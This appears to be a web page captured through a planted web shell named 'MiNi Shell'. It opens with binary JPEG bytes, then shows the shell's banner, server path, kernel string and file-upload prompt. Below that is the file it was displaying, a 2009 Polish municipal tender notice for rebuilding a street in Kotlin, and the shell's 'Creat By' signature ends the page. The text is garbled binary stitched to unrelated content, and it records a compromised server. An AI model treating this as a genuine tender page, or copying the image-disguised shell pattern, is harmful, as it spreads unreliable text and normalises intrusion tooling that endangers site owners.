JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090429/125982-N-2009.html

<p class="kh_header"><b>Kotlin: Przebudowa ulicy Buchalińskiej w miejscowości Kotlin</b><br>
<b>Numer ogłoszenia: 125982 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kotlin , ul. Powstańców Wielkopolskich 1, 63-220 Kotlin, woj. wielkopolskie, tel. 062 7405481, faks 062 7405481.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kotlin.bip.net.pl.-gmina przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Buchalińskiej w miejscowości Kotlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przebudowę ulicy Buchalińskiej w miejscowości Kotlin.
Zakres prac do wykonania :
a) roboty przygotowawcze,
b) roboty ziemne,
c) podbudowy z kruszywa łamanego,
d) nawierzchnia,
e) roboty wykończeniowe
Obliczenie ilości robót :
1. roboty pomiarowe - odtworzenie osi trasy drogi w terenie równinnym - 412,77m,
2. roboty ziemne - obejmują wykonanie wykopów na poboczach na odcinku od KM 0+000,00 do KM 0+ 108,15 oraz wykonanie poboczy z gruntu uzyskanego z wykopów na pozostałym odcinku drogi
- wykopy wykonane mechanicznie w gr. kat. III z załadunkiem i transportem urobku samochodami samowyładowczymi na odległość do 1 km ( odwóz z placu budowy ) - 324 m3,
- dodatek za 4 km odwozu gruntu uzyskanego z wykopów ( łączna odległość wywozu 5 km ) - 324 m3,
- roboty ziemne poprzeczne - ( kat. Gr. III ) - 42 m3,
- formowanie i zagęszczanie nasypów w gruncie kat. III - grunt uzyskany z wykopów 42 m3,
- mechaniczne wykonanie koryta pod jezdnię oraz wjazdy do posesji - 1961,12 m2,
3. Podbudowy
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 mm kat.II gat. I - warstwa o grubości po zagęszczeniu 15 cm ( granit, melafir,gabro ) - 516,63 m2,
- wjazdy na posesje - 198,53 m2,
- jezdnia od KM 0+300,00 do KM 0+387,83
87,82 x 2,50 = 219,55 m2,
- jezdnia od KM 0+ 387,82 do KM 0+412,77
24,95 x 3,00 +0,5x 1,90x 24,95 = 98,55 m2
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0,31,5 mm kat. II gat. I - warstwa o grubości po zagęszczeniu 20 cm ( granit, melafir, gabro ) - 1.726,41 m2,
odcinek od KM 0 + 000,00 do KM 0 + 387,82 - 1.698,27 m2,
łuki wjazdowe na drogę powiatową - 28,14 m2,
4. Nawierzchnie
- oczyszczenie i skropienie powierzchni warstwy niebitumicznej w ilości 0,5 kg/m2 - 2.144,49 m2,
- warstwa ścieralna z betonu asfaltowego KR 1-2 o uziarnieniu 0-12,8 mm - grubości po zagęszczeniu 5 cm - 1.966,93 m2
5. Roboty wykończeniowe
- słupki do znaków drogowych z rur stalowych o śr 70 mm - 1 szt.
- przymocowanie tablic znaków drogowych - 1 szt.,
- regulacja wysokościowa włazów studni kanalizacyjnych - 10 szt.,
- wykonanie poboczy gruntowych z materiału uzyskanego z wykopów - 448 m2.
Ponadto szczegółowy zakres prac ujeto w :
- dokumentacji projektowej stanowiacej załącznik do SIWZ,
- specyfikacji technicznej wykonania i odbioru robót budowlanych określajacej zbiory wymagań niezbędnych do określenia stadartu i jakości wykonania robót w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót - załącznik do SIWZ,
- przedmiarze robót - zawierającym zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania wraz z szczegółowym opisem, wskazaniem podstaw ustalających szczegółowy opis , z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalenia cen jednostkowych robot - stanowiącym załącznik do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 2.500,00 zł
słownie : dwa tysiace pięćset złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki okreslone w art. 22 ustawy z dnia 29 stycznia 2004 r.Prawo zamówień publicznych  z zmianami oraz nie podlegają wykluczeniu z postępowania na podtawie art. 24 ustawy Prawo zamówień publicznych
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
a) wykonawca powinien dysponować nastepującym sprzetem własnym lub w stałej dyspozycji : 
- koparka podsiebierna lub koparko - ładwarka,
- równiarka,
- spycharka,
- walec statyczny samojezdny,
- walec statyczny samojezdny ogumiony,
- walec wibracyjny ( roboty ziemne ),
- zagęszczarka płytowa,
- samochody samowyładowcze o ładownosci 10-15 t,
- skrapiarka do bitumu,
- rozkładarka mas bitumicznych,
- szczotka mechaniczna,
- piła mechaniczna do cięcia nawierzchni z mas bitumicznych, 
- beczkowóz
b) wykonawca musi dysponować osobami z uprawnieniami zawodowymi niezbędnymi do wykonania przedmiotu zamówienia oraz musi zapewnić uczestnictwo w wykonaniu zamówienia kierownika budowy posiadającego odpowiednio do zakresu zamówienia uprawnienia budowlane, będacego czynnym członkiem Okręgowej Izby Inzynierów Budownictwa,
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniajacej wykonanie zamówienia: wykonawca musi posiadać środki finansowe ( własne ) lub zdolność kredytową w wysokosci nie ,niejszej niż 100.000,00 zł,
d) udokumentują, że w okresie ostatnich pięciu lat ( rozpoczęli i zakończyli ), przed dniem wszczęcia postepowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie nalezycie i rzetelnie wykonali co najmniej 2 ( dwie ) roboty budowlane odpowiadajace swoim zakresem i charakterem robotom stanowiącym przedmiot zamówienia. Przez podobną robotę budowlaną Zamawiajacy rozumie budowę, przebudowę dróg o nawierzchni bitumicznej,
e) w przypadku skladania oferty przez podmioty wspólne, warunek musi spełnić co najmniej jeden podmiot,
f) udzielą gwarancji co najmniej na 3 ( trzy ) lata licząc od dnia odbioru końcowego,
g) wniosą wadium w wymaganym terminie i wysokości 2.500,00 zł, słownie : dwa tysiące pięćset złotych.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć nastepujace dokumenty :
1) Ofertę na formularzu oferty, o treści zgodnej z okresloną w wzorze stanowiącym załącznik nr 1 do SIWZ,
2) Oświadczenia oraz dokumenty potwierdzajace spełnianie warunków :
a) dokument potwierdzający dopuszczenie wykonawcy do obrotu prawnegp w zakresie objętym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jezeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wczesniej niż  6 miesięcy przed upływem terminu składania ofert,
b) umowa spółki - w przypadku, gdy wykonawcą jest spółka cywilna lub jawna,
c) Pełnomocnictwo ustanawiajace pełnomocnika w przypadku wnoszenia oferty wspólnej,
d) oswiadczenie o tresci okreslonej w art. 22 ust. 1 ustawy Prawo zamówień publicznych,
e) Oświadczenie o treści okreslonej w art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
f) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz własciwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, ze wykonawca nie zalega z opłacaniem podatków, oplat oraz skladek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, ze uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłozenie na raty zaległych płatności lub wstrzymanie w całosci wykonania decyzji właściwego organu - wystawione nie wczesniej niż 3 miesiace przed upływem terminu składania ofert,
g) Aktualna informacja z Krajowego Rejestru Karnego w zakresie okreslonym w art. 24 ust. 1, pkt. 4-8 ustawy Prawo zamówień publicznych wystawione nie wczesniej niż 6 miesięcy przed upływem terminu składania oferty ( w przypadku, gdy wykonawcy występują wspólnie stosowne dokumenty dostarczy każdy z wykonawców ),
h) Aktualna informacja z Krajowego Rejestrui Karnego w zakresie okreslonym w art. 24 ust. 1, pkt. 9 ustawy Prawo zamówień publicznych wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty ( w przypadku , gdy wykonawcy występują wspólnie stosowne dokumenty dostarczy każdy z wykonawców ),
i) Wykaz co najmniej dwóch ( 2 )  robót wykonanych i zakończonych w ciągu ostatnich pięciu ( 5 ) lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w zakresie będącym przedmiotem zamówienia, z podaniem ich wartości oraz daty wykonania oraz odbiorów wraz z załączeniem dokumentów potwierdzajacych, ze roboty te zostały wykonane nalezycie ( referencje, listy , rekomendacje ) - wg wzoru stanowiacego załącznik nr 2 do SIWZ,
j) informacja banku prowadzacego rachunek bankowy Wykonawcy, w której potwierdza się posiadanie środków finansowych lub zdolność kredytową w wysokosci nie niejszej niż 100.000,00 zł wystawioną nie wczesniej niż 3 miesiące przed upływem terminu składania ofert,
k) wykaz osób i podmiotów, które bedą uczestniczyć w wykonaniu zamówienia wraz z załączonymi uprawnieniami i aktualnym zaświadczeniem o przynależności do Okregowej Izby Samorządu Zawodowego - wg wzoru stanowiącego załącznik nr 3 do SIWZ. Pracownicy produkcyjni ( operatorzy sprzetu, kierowcy itp.), którzy zostaną wytypowani do realizacji zadania muszą posiadać odpowiednie uprawnienia - co nalezy potwierdzić odpowiednimi dokumentami. Wszyscy pracownicy produkcyjni winni posiadać aktualne badania lekarskie oraz być przeszkoleni w zakresie BHP, co wykonawca poświadczy składając na tą okoliczność oświadczenie.
l) wykaz sprzetu, którym będzie dysponował wykonawca przy realizacji niniejszego zamówienia - wg wzoru załącznika nr 4 do SIWZ,
m) dokument potwierdzajacy wniesienie wadium,
n) Oświadczenie o udzielonej gwarancji na przedmiot umowy zgodnie z wzorem stanowiącym załącznik nr 5 do SIWZ,
o) informacja o ewentualnych podwykonawcach - załącznik nr 6 do SIWZ,
p) wypełniony i parafowany podpisem wykonawcy wzór umowy w oparciu o formularz stanowiący załącznik do SIWZ,
r) wypełniony kosztorys ofertowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kotlin.bip.net.pl.- gmina przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Kotlinie
63-220 Kotlin, ul. Powstańców Wlkp. 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 10:00, miejsce: Urząd Gminy w Kotlinie
63-220 Kotlin, ul. Powstańców Wlkp. 3, pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 23.06.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com